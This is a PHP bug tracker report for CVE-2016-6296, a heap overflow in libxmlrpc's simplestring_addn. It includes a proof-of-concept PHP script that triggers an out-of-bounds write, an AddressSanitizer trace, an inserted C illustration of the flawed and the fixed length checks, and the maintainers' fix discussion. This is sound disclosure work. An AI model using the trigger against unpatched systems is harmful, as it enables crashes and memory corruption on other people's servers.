Sec Bug #72606 heap-buffer-overflow (write) simplestring_addn simplestring.c
Submitted: 2016-07-17 09:08 UTC Modified: 2016-07-25 15:21 UTC
From: pranjal dot jumde at gmail dot com Assigned: stas (profile)
Status: Closed Package: XMLRPC-EPI related
PHP Version: 5.5.37 OS: All
Private report: No CVE-ID: 2016-6296
 [2016-07-17 09:08 UTC] pranjal dot jumde at gmail dot com
Description:
------------
String length checks in simplestring_addn in simplestring.c use the length as a signed integer. This can be used by a malicious PHP script to cause an out-of-bounds write on the heap.

Tested on the git source at https://github.com/php/php-src.git, commit 735bec4f4018a4009a37d96489afe941c1ad711a, compiled with AddressSanitizer.

Repro steps: Run the attached PHP script with an xmlrpc-enabled build of PHP.

$php poc.php 
=================================================================
==57127==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000bac0 at pc 0x00010a958bfe bp 0x7fff56c74b50 sp 0x7fff56c74310

WRITE of size 2147483581 at 0x60c00000bac0 thread T0

    #0 0x10a958bfd in __asan_memcpy (libclang_rt.asan_osx_dynamic.dylib+0x41bfd)
    #1 0x10995aeb5 in simplestring_addn simplestring.c:212
    #2 0x10996293d in simplestring_out_fptr xml_element.c:513
    #3 0x109962580 in xml_element_serialize xml_element.c:281
    #4 0x109962025 in xml_element_serialize xml_element.c:482
    #5 0x109961807 in xml_elem_serialize_to_string xml_element.c:542
    #6 0x109963cf9 in XMLRPC_REQUEST_ToXML xmlrpc.c:714
    #7 0x109951b37 in zif_xmlrpc_encode_request xmlrpc-epi-php.c:700
    #8 0x109d22727 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER zend_vm_execute.h:675
    #9 0x109c1ea04 in execute_ex zend_vm_execute.h:432
    #10 0x109c1f3d4 in zend_execute zend_vm_execute.h:474
    #11 0x109b1c4ab in zend_execute_scripts zend.c:1447
    #12 0x1099b241e in php_execute_script main.c:2533
    #13 0x109dee25d in do_cli php_cli.c:990
    #14 0x109dec029 in main php_cli.c:1378
    #15 0x7fffdf84d284 in start (libdyld.dylib+0x5284)
    #16 0x1  (<unknown module>)

0x60c00000bac0 is located 0 bytes to the right of 128-byte region [0x60c00000ba40,0x60c00000bac0)
allocated by thread T0 here:
    #0 0x10a961e07 in wrap_realloc (libclang_rt.asan_osx_dynamic.dylib+0x4ae07)
    #1 0x10995ae30 in simplestring_addn simplestring.c:205
    #2 0x10996293d in simplestring_out_fptr xml_element.c:513
    #3 0x109961b8d in xml_element_serialize xml_element.c:281
    #4 0x109962025 in xml_element_serialize xml_element.c:482
    #5 0x109961807 in xml_elem_serialize_to_string xml_element.c:542
    #6 0x109963cf9 in XMLRPC_REQUEST_ToXML xmlrpc.c:714
    #7 0x109951b37 in zif_xmlrpc_encode_request xmlrpc-epi-php.c:700
    #8 0x109d22727 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER zend_vm_execute.h:675
    #9 0x109c1ea04 in execute_ex zend_vm_execute.h:432
    #10 0x109c1f3d4 in zend_execute zend_vm_execute.h:474
    #11 0x109b1c4ab in zend_execute_scripts zend.c:1447
    #12 0x1099b241e in php_execute_script main.c:2533
    #13 0x109dee25d in do_cli php_cli.c:990
    #14 0x109dec029 in main php_cli.c:1378
    #15 0x7fffdf84d284 in start (libdyld.dylib+0x5284)
    #16 0x1  (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow (libclang_rt.asan_osx_dynamic.dylib+0x41bfd) in __asan_memcpy
==57127==ABORTING
Abort trap: 6



Test script:
---------------
<?php
// Build a string of 2147483581 bytes, just under 2^31, so its length no longer
// fits the signed 32-bit arithmetic used by simplestring_addn.
ini_set('memory_limit', '2148M');
$max = 2147483582;

$name = '';
for ($i = 1; $i < $max; $i++) {
    $name .= 'a';
}

// The method name is serialized through simplestring_addn (see the stack trace above).
$request = xmlrpc_encode_request($name, "somevalue");
?>

Expected result:
----------------
No crash. Patch attached.
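An illustration of the bug class for readers of this report, added here and not the code of libxmlrpc or of the fix commit: a minimal append buffer whose "must grow" decision is modelled with 32-bit signed arithmetic (the flawed pattern), beside a size_t version with an explicit overflow guard before any length arithmetic. The values 128 and 2147483581 come from the ASan report above; the prefix length 66 is a constructed assumption.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Minimal append buffer in the spirit of simplestring (illustrative only). */
typedef struct { char *str; size_t len; size_t size; } sbuf;

/* The flawed growth test, modelled with explicit 32-bit wraparound so this file
 * itself has no undefined behaviour: len + add_len + 1 computed in int can pass
 * INT32_MAX and wrap negative, so the comparison against the current capacity
 * fails and the caller goes on to memcpy add_len bytes into the old buffer.
 * Returns 1 if the int-based check would decide the buffer must grow. */
int needs_grow_int32(int32_t len, int32_t size, int32_t add_len) {
    int32_t need = (int32_t)((uint32_t)len + (uint32_t)add_len + 1u);
    return need > size;
}

/* Hardened append: size_t lengths plus a guard that rejects any add_len for
 * which len + add_len + 1 would overflow, before the arithmetic is done.
 * Returns 1 on success, 0 if the append was refused or allocation failed. */
int sbuf_addn(sbuf *t, const char *src, size_t add_len) {
    if (!t || !src) return 0;
    if (add_len > SIZE_MAX - 1 - t->len) return 0;   /* would overflow: refuse */
    if (t->len + add_len + 1 > t->size) {
        size_t newsize = t->len + add_len + 1;
        if (newsize < SIZE_MAX / 2) newsize *= 2;     /* amortised growth, no overflow */
        char *p = realloc(t->str, newsize);
        if (!p) return 0;                             /* keep the old buffer intact */
        t->str = p;
        t->size = newsize;
    }
    memcpy(t->str + t->len, src, add_len);
    t->len += add_len;
    t->str[t->len] = '\0';
    return 1;
}

int main(void) {
    /* Constructed scenario: 66-byte prefix already in a 128-byte buffer, then a
     * 2147483581-byte append. The int model says "no growth needed". */
    int skipped = !needs_grow_int32(66, 128, 2147483581);
    sbuf b = { NULL, 0, 0 };
    sbuf_addn(&b, "hello", 5);
    int refused = !sbuf_addn(&b, "x", SIZE_MAX);      /* guard fires before memcpy */
    free(b.str);
    return (skipped && refused) ? 0 : 1;
}
```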


 [2016-07-17 20:27 UTC] stas@php.net
-Package: Reproducible crash +Package: XMLRPC-EPI related
 [2016-07-17 23:49 UTC] stas@php.net
This code seems to be part of libxmlrpc. It would make sense to report it to them; the homepage seems to be here: http://xmlrpc-epi.sourceforge.net/

While PHP can mitigate the issue, ultimately the package maintainers should take care of it.
 [2016-07-18 00:04 UTC] stas@php.net
Looking more into it, it's not easy to fix it outside of libxmlrpc, as everything is happening inside the library, and I'm not sure it's even maintained now.
 [2016-07-18 00:16 UTC] pranjal dot jumde at gmail dot com
Thanks Stanislav, did you get a chance to review the patch I uploaded for this issue? It was a band-aid fix, but I agree that the actual fix would be in the xml-rpc library.

From: http://gggeek.github.io/phpxmlrpc/

I think ggiunta at users.sourceforge.net would be the right person to comment. Could you add him to the CC list of this bug?
 [2016-07-18 00:46 UTC] stas@php.net
I'm sorry, I don't see any patches attached. Could you send it to stas@php.net or upload to gist.github.com as secret gist?
 [2016-07-18 18:03 UTC] pranjal dot jumde at gmail dot com
I mailed the patch to you; let me know if you have any questions about it.
 [2016-07-19 04:45 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-07-19 04:45 UTC] stas@php.net
Fix in security repo as e6c48213c22ed50b2b987b479fcc1ac709394caa and in https://gist.github.com/6eaf2bc74f9bc9db34cb4b10ed06b466
 [2016-07-19 04:46 UTC] stas@php.net
-PHP Version: 7.1.0alpha3 +PHP Version: 5.5.37
 [2016-07-19 06:33 UTC] pranjal dot jumde at gmail dot com
The patch looks good, thanks for the quick turn around. Could you provide any details on the tentative release timeline?
 [2016-07-19 07:47 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 07:47 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-07-19 07:53 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 08:39 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 08:55 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 15:56 UTC] pranjal dot jumde at gmail dot com
Since this report is public now, could you please assign a CVE-ID to this bug?
 [2016-07-25 15:21 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2016-6296
 [2016-10-17 10:11 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c